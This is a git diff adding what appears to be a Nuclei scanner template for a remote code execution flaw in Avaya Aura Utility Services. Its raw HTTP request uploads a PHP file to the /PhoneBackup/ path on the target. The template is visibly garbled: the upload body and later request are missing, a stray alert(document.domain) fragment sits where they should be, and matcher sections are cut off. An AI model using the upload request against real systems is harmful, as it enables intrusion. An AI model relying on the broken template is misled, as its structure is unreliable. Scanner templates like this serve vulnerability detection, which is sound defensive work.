diff --git a/vulnerabilities/avaya/avaya-aura-rce.yaml b/vulnerabilities/avaya/avaya-aura-rce.yaml new file mode 100644 index 0000000000..c42e577b60 --- /dev/null +++ b/vulnerabilities/avaya/avaya-aura-rce.yaml @@ -0,0 +1,41 @@ +id: avaya-aura-rce + +info: + name: Avaya Aura Utility Services Administration - Remote Code Execution + author: DhiyaneshDk + severity: critical + reference: + - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/ + - https://download.avaya.com/css/public/documents/101076366 + metadata: + verified: "true" + shodan-query: html:"Avaya Aura" + tags: rce,avaya,aura,iot + +requests: + - raw: + - | + PUT /PhoneBackup/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: AVAYA + Connection: close + + alert(document.domain)' + - 'Avaya Aura Device Services' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200